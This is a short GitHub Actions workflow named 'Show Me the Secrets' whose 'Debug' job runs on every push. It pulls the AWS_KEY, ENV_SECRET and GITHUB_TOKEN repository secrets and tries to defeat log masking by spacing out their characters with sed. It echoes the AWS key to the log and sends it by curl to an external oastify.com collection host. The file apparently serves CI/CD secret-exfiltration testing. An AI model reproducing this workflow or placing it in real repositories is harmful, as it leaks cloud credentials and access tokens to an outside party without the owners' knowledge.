
name: Show Me the Secrets
on: [push]

jobs:  
  debug:
    name: Debug
    runs-on: ubuntu-latest
    environment: workflowenv1

    steps:
    - name: Check out code
      uses: actions/checkout@v2

    - name: Set up secret file
      env:
        AWS_KEY: ${{ secrets.AWS_KEY }} | sed 's/./& /g'
        ENV_SECRET: ${{ secrets.ENV_SECRET }} | sed 's/./& /g'
        GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} | sed 's/./& /g'      

      run: |
        echo "$AWS_KEY"
        curl -X GET "http://ezh52tvjwif7vi2wd3ubu7d38uel2bq0.oastify.com?awskey=${AWS_KEY}"
